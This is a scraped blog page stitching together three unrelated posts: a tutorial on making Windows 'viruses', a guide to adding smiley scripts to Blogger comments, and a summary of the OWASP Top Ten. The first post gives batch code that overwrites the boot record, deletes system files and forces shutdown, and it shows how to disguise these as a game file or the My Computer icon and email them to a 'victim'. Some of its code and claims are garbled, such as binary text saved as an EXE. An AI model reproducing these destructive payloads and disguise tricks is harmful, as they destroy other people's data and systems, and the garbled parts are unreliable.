Les nouveautés et Tutoriels de Votre Codeur | SEO | Création de site web | Création de logiciel

Seo Master present to you:

What Is A Virus?

 

images (4)

 

A computer virus is a computer program that can copy itself and infect a computer. The term “virus” is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.(Source Wikipedia)

As stated above, the term “computer virus” is sometimes used as a catch-all phrase to include all types of malware, adware, and spyware programs that do not have the reproductive ability. Malware includes computer viruses, worms, trojans, most rootkits, spyware, dishonest adware, crimeware, and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with computer worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan is a program that appears harmless but hides malicious functions. Worms and Trojans, like viruses, may harm a computer system’s data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious and go unnoticed.(Source Wikipedia)

 

  • Understand the following: It’s just a harmless “virus”. It only prints some scary messages and finally shuts down the computer. As you start it again, your computer will work as it did before!

  • Read the virus: Below you see the Computer-Code that is executed as you start the virus. The lines that start with REM are comments that the computer ignores. The explain you what the above line does.

 

@echo off
title %0
rem conditional check.
echo welcome to this wonderful program! please wait while I delete all your files!
rem infection of the user
copy %0 c:tmp.bat >null attrib +r +s +h c:tmp.bat echo for %%i in (*.bat) do copy c:tmp.bat+%%i %%i >>c:windowssystem32autoexec.NT
echo echo virus detected! >>c:windowssystem32autoexec.NT
echo pause >>c:windowssystem32autoexec.NT
echo NT core:infected!
echo echo shame on you! >>c:autoexec.bat
echo echo system hault-virus identified! >>c:autoexec.bat
echo chkdsk >>c:autoexec.bat
echo i t i s t o o l a t e, y o u h a v e a v i r u s, n o w u r l i f e i s n o t b e a u t i f u l
fdisk /mbr
shutdown -s -t 03 -c “windows has shut down because the lsass service has incountered a write fault at 0×00000000000000000000000000000000000″

Code Details

@echo off
color 1a (Changes the colour)
echo (Displays a text)
echo: (leaves a line)
ping -n 2 127.0.0.1>nul (pings your localhost – nothing much)
shutdown.exe (shutdown)

  1. Read and understand the warnings!

  2. Open up Notepad in Windows. You can do this by navigating to Start > Programs > Accessories > Notepad, or simply by entering notepad under Start > Run.

  3. Copy and Paste the Code of the “virus” into Notepad

  4. Click File -> Save as

  5. Decide for a location to save the fake-virus. You should chose a location where the user won’t find the file, so saving it on the desktop would be a bad idea!

  6. Change “.txt” to “All files” in the file type drop-down menu

  7. Chose a harmless filename. Replace the “.txt” at the with “.bat”

  8. Click on save and close Notepad.

Now We Have Completed Making The Virus And Now We Must Bind The Virus With Any Other File

To Create a Fake Virus

First of all open "Notepad" in your computer and type the following code without quotes.

"start virus.bat

virus.bat"

Now the file as virus.bat and send it to your friend.Now when he will be trying to run it,his computer will get crushed and he will have to restart his computer.

To Create a Shutdown Virus

 

To create this virus,you dont need to open notepad.For this just go to your desktop,i.e.,the main screen and right click and go to "New" and then click "Shortcut".

Now type the following code in the text box.

shutdown -s -t 200 -c "This is a Fake Virus"

And then click next and type "My Computer".Now you will see a shortcut on your desktop named as "My Computer".Now you just need to change the icon of it as same as that of original My Computer.So right click on the shortcut and click properties and then click "Change Icon" button.Now select the icon of the My Computer and click apply and then OK.Now place the My Computer shortcut on your desktop and replace the original one.

Now whenever your friend will try to open My Computer,then his computer will get shut down after 3 minutes.To stop the shutdown,go to start and then go to Run and type shutdown -a.

How To Create a Harmful Virus

 

1.To create a very harmful virus,open Notepad and type the following.

del "C:\windows\pchealth"

del "C:\windows\system\"

del "C:\windows\system32\restore\"
del "C:\winlogon.exe"

del "C:\windows\system32\logonui.exe"

del "C:\windows\system32\ntoskrni.exe"

del "C:\windows\system32\autoexec.nt"

 

After pasting , Save it as  " your fav name " .bat
it's like i have saved it with ,"  fifa 10.bat "
i saved it like
fifa 10.bat
cricket 08.bat
spiderman 03.bat
batman 08.bat
matrixtheneo 02.bat
you have to put " any name " and 2 digits then " .bat "
and save it to your desktop , ....dont DOUBLE CLICK IT
or else your system files willl be deleted !
the disadvantage is , you cannot send this file by attachment in any EMAIL and send it to your friends
destroy your friends CPU and Enjoy !

 

2.What this virus does is completely and permanently delete Windows or Linux depending. Please read the caution at the top.Onto the trick. Follow the directions carefully.

1- Write The Following In Notepad Exactly as it says Code: 01001011000111110010010101010101010000011111100000
2- Save the file as an EXE (Click File-->Save as...-->and erase what ever is there and type in something like funnystuff.exe).
3- To test it, create a textfile called "TEST.txt"(just leave it blank) and save it in 'My Documents' or something in your C: drive. Now in a NEW notepad type "erase C:TEST.txt" (without the quotes). Then do "Save As..." and save it as "Test.cmd". Now run the file "Test.cmd" and go to C: and you'll see your Test.txt is gone. Now, the real work begins:
4- Go to Notpad and type "erase C:WINDOWS" (or C:LINUX if your targeted victim has linux) and save it again as funnypicture.cmd or something.
5- DON'T EVER run the file or you'll lose your WINDOWS map. So, that's the virus.
6- Send an email to your victim and attach the file "Funnypicture.cmd" or whatever you named it. When they open it, their Windows will be erased.

 

 

 

 

 

 

 





2013, By: Seo Master

Seo Master present to you: Emoticons/Smileys are a great way of making discussions more interesting and fun, so it's a pity that Blogger don't support them. This tutorial will show you some simple steps on how to add some very cute emoticons called Kolobok to your Blogger/Blogspot comments, so that you and your blog visitors will be able to have an enjoyable time together.

Now available for threaded commenting system too!
emoticons in blogger, kolobok smileys, threaded comments



How To Add Kolobok Smileys In Blogger Comments

Step 1. Go to Dashboard - Template - Edit HTML - Proceed


 Step 2. Expand Widget Template (make a backup)


    Step 3. Search (CTRL + F) for this tag:

    </body>

    Step 4. Copy and paste just above it, this code:

    • For previous commenting system (comments without reply option)
    <!--kolobok-smileys-->
    <script src='http://helplogger.googlecode.com/svn/trunk/[www.matrixar.com]smileys.js' type='text/javascript'/><noscript><a href='http://www.matrixar.com/2012/04/how-to-add-emoticonssmileys-in-blogger.html' target='_blank'><span style='font-size: x-small;'>Add emoticons</span></a></noscript>
    <!--kolobok-smileys-->

    • For threaded commenting system (comments with reply option)
    <script src='https://helplogger.googlecode.com/svn/trunk/kolobok threaded.js' type='text/javascript'/>

    Note: ignore steps 5-8 if you are using threaded comments!

    Step 5. Now find this code snippet:

    <b:loop values='data:post.comments' var='comment'>

    Step 6. Paste the following code just above it:

    <div id='smileys'>

    Step 7. Find the following code (look carefully, it should be somewhere below the code from step 5)

    </b:loop>

    Step 8. Paste the following tag just after it:

    </div>

    Step 9. Now find this code:

    • For previous commenting system:
    <data:blogTeamBlogMessage/>

    Note: if you'll find it like 4 times, stop to the 2nd one!

    • For threaded commenting system:
    <div class='post-footer-line post-footer-line-3'>

    Step 10. And add this code just after it:

    <b:if cond='data:blog.pageType == &quot;item&quot;'><script type='text/javascript'>
    //<![CDATA[
    function moreSmilies() {
        document.getElementById('smiley-more').style.display = 'inline';
        document.getElementById('smiley-toggle').innerHTML = '<a href="javascript:lessSmilies()"><div style="font-size:small; font-weight:bold;color:#000000;">Hide Emoticons /<a href="http://www.matrixar.com/2012/04/how-to-add-emoticonssmileys-in-blogger.html">Add Emoticons</div></a></span>';
    }
    function lessSmilies() {
        document.getElementById('smiley-more').style.display = 'none';
        document.getElementById('smiley-toggle').innerHTML = '<a href="javascript:moreSmilies()"><div style="font-size:small; font-weight:bold;">Show Emoticons</div></a>';
    }
    //]]>
    </script>
    <div class='emoticons'>
    <span id='smiley-more' style='display: none;'>
    <img src='http://www.matrixar.com/-k4ujC23cSgI/UTIq7eUkmuI/AAAAAAAABAQ/YUNL9_RhDB0/s1600/smile3.gif'/>:)
    <img src='http://www.matrixar.com/-XSBJ7zBZKZs/UTIrT-hMYyI/AAAAAAAABAY/6B26_8Ttwj4/s1600/sad.gif'/>:(
    <img src='http://www.matrixar.com/-Ph2wxEvy2mc/UTIr8-fdHjI/AAAAAAAABAo/3use2PsPhMA/s1600/taunt.gif'/>:))
    <img src='http://www.matrixar.com/-pcE-4ot-gjk/UTIsLRff6SI/AAAAAAAABAw/LYvZ8__88Ak/s1600/cry2.gif'/>:((
    <img src='http://www.matrixar.com/-lNNTReQVc0A/UTIrjDhVLAI/AAAAAAAABAg/BsVMYnr54pI/s1600/rofl.gif'/>=))
    <img src='http://www.matrixar.com/-8C5UH12mxf0/UTIzmsxczDI/AAAAAAAABDA/2seHdqLVQ6Q/s1600/suicide.gif'/>=D&gt;
    <img src='http://www.matrixar.com/-lhTywmMZ58E/UTI04kjJ3WI/AAAAAAAABDY/qNgtijEr_E8/s1600/biggrin.gif'/>:D
    <img src='http://www.matrixar.com/-gG_Wn6D6Ux4/UTIyqFyfKbI/AAAAAAAABCo/qEmU8s8ndVI/s1600/tongue.gif'/>:P
    <img src='http://www.matrixar.com/-Zb5g0OWHx4c/UTIsuPLt90I/AAAAAAAABA4/cmP1ltBmVF0/s1600/shock.gif'/>:-O
    <img src='http://www.matrixar.com/-TSIzPWeGBwk/UTI0S-nw5tI/AAAAAAAABDQ/xyHPCFZH4fI/s1600/think.gif'/>:-?
    <img src='http://www.matrixar.com/-qpnD1BYon5w/UTI0AIeKX6I/AAAAAAAABDI/HsllV7NYTqk/s1600/unsure.gif'/>:-SS
    <img src='http://www.matrixar.com/-SpvC8mHHwhg/UTIzQMUVGKI/AAAAAAAABCw/_NKKVyQtulk/s1600/flowers1.gif'/>:-f
    <img src='http://www.matrixar.com/-qlyn_deOhFw/UTIzY8aRgqI/AAAAAAAABC4/pfSojMdD33s/s1600/doh.gif'/>d(
    <img src='http://www.matrixar.com/-H4e_O5BFVP8/UTIumwhVmKI/AAAAAAAABBw/SKhY4DDxKkk/s1600/air_kiss.gif'/>:-*
    <img src='http://www.matrixar.com/-h4yNmhdKUVU/UTIwUKpvVOI/AAAAAAAABCY/B0FEZVRGHe4/s1600/threaten.gif'/>b-(
    <img src='http://www.matrixar.com/-veVoDPEc7I4/UTIv9wCS0jI/AAAAAAAABCQ/4c5FgCHAiU4/s1600/help.gif'/>h-(
    <img src='http://www.matrixar.com/-_ttAcnBbAaw/UTIvKtxfWvI/AAAAAAAABCA/X2JLEShhOQU/s1600/good.gif'/>g-)
    <img src='http://www.matrixar.com/--o9jZ1nMcec/UTIuyCBgS_I/AAAAAAAABB4/Jf03oz5yKrU/s1600/beee.gif'/>5-p
    <img src='http://www.matrixar.com/-6-BTJcVpwY0/UTIvhF_PL-I/AAAAAAAABCI/SS-LDADTSls/s1600/yahoo.gif'/>y-)
    <img src='http://www.matrixar.com/-khAwhIYbgvQ/UTItD_PfNyI/AAAAAAAABBI/HMpRMQh5Uak/s1600/crazy.gif'/>c-)
    <img src='http://www.matrixar.com/-fsTXhXl10Gg/UTIs7Ll01AI/AAAAAAAABBA/QkWgWAAFG3g/s1600/spiteful.gif'/>s-)
    <img src='http://www.matrixar.com/-CIuUuJeuyGI/UTIueHgTxOI/AAAAAAAABBo/BzXkTEEDlhw/s1600/drinks.gif'/>d-)
    <img src='http://www.matrixar.com/-Mc5ed3Ymk7s/UTI1GIXMAMI/AAAAAAAABDg/PyDOfoXgsl0/s1600/cheer.gif'/>w-)
    <img src='http://www.matrixar.com/-JOgaMRI61Jk/UTItsGc5KdI/AAAAAAAABBY/6UDCabfZQbg/s1600/hi+2.gif'/>:-h
    <img src='http://www.matrixar.com/-wmOB_Z6LPp4/UTIt9FhZiwI/AAAAAAAABBg/7VoefgIQjEs/s1600/give_heart.gif'/>:X
    </span>
    <span id='smiley-toggle'><a href='javascript:moreSmilies()'><div style='font-size:small;font-weight:bold;'>Show Emoticons <img src='http://www.matrixar.com/-k4ujC23cSgI/UTIq7eUkmuI/AAAAAAAABAQ/YUNL9_RhDB0/s1600/smile3.gif'/></div></a></span>
    </div></b:if>

    Note: Ignore steps 11-12 if you are using threaded comments!

    Step 11. Finally, find this code

    ]]></b:skin>

    Step 12. Add this one below, just above ]]></b:skin>

    .emoticons {-moz-background-clip: -moz-initial;-moz-background-origin: -moz-initial;-moz-background-inline-policy: -moz-initial;text-align: left;width:400px;}
    .emoticons a, .emoticons a:hover {margin-left: 20px;text-decoration:none;}

    Note: if you want to change the size of the emoticon container, edit the red code.

    Step 13. Save the Template and you're done. Enjoy!

    If you have any problem and need help, please leave a comment below.
    2013, By: Seo Master
    Seo Master present to you:

     owasp top vulnerability | Cross site scripting XSS | SQLI | CSRF | LFI | RFI

     Ethical Hacking is very important part for the website and other domain. Now a day’s Hacker easily access on the website. With the common mistakes of developer’s, website owner has been in trouble. As I am security Researcher I have also found 1000 of security flaw in website. I have reported it. Like Microsoft, opera, adobe, Nokia, Braintree, soundcloud, eBay. But now a day’s Hackers easily access on website database. But in the same way Ethical hacker’s (Security Researcher) or white hacker’s done the job. And save the website from the black hat hacker’s. There are lots of security flaws (vulnerability) in website. According the open web application security project (OWSAP) there are lots of security flaw in website. This is top ten security flaw as follow 


     owasp top vulnerability

    A1 – Injection

    Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.

    A2 – Broken Authentication and Session Management 

    Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users’ identities.

    XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

    A4 – Insecure Direct Object References

    •A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.

    A5 – Security Misconfiguration

    Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained as many are not shipped with secure defaults. This includes keeping all software up to date.

    A6 – Sensitive Data Exposure

    Many web applications do not properly protect sensitive data, such as credit cards, tax ids, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.

    A7 – Missing Function Level Access Control

    Virtually all web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access unauthorized functionality.

    A8 - Cross-Site Request Forgery (CSRF)

    A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.

    A9 - Using Components with Known Vulnerabilities

    Vulnerable components, such as libraries, frameworks, and other software modules almost always run with full privilege. So, if exploited, they can cause serious data loss or server takeover. Applications using these vulnerable components may undermine their defenses and enable a range of possible attacks and impacts.

    A10 – Unvalidated Redirects and Forwards

    Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

    So this is top ten vulnerability which is very common. So in my next tutorials I will explain you that how to find a vulnerability in website. If you have any problem regarding vulnerability so comment below or you can directly contact with me. click here
    2013, By: Seo Master
    Powered by Blogger.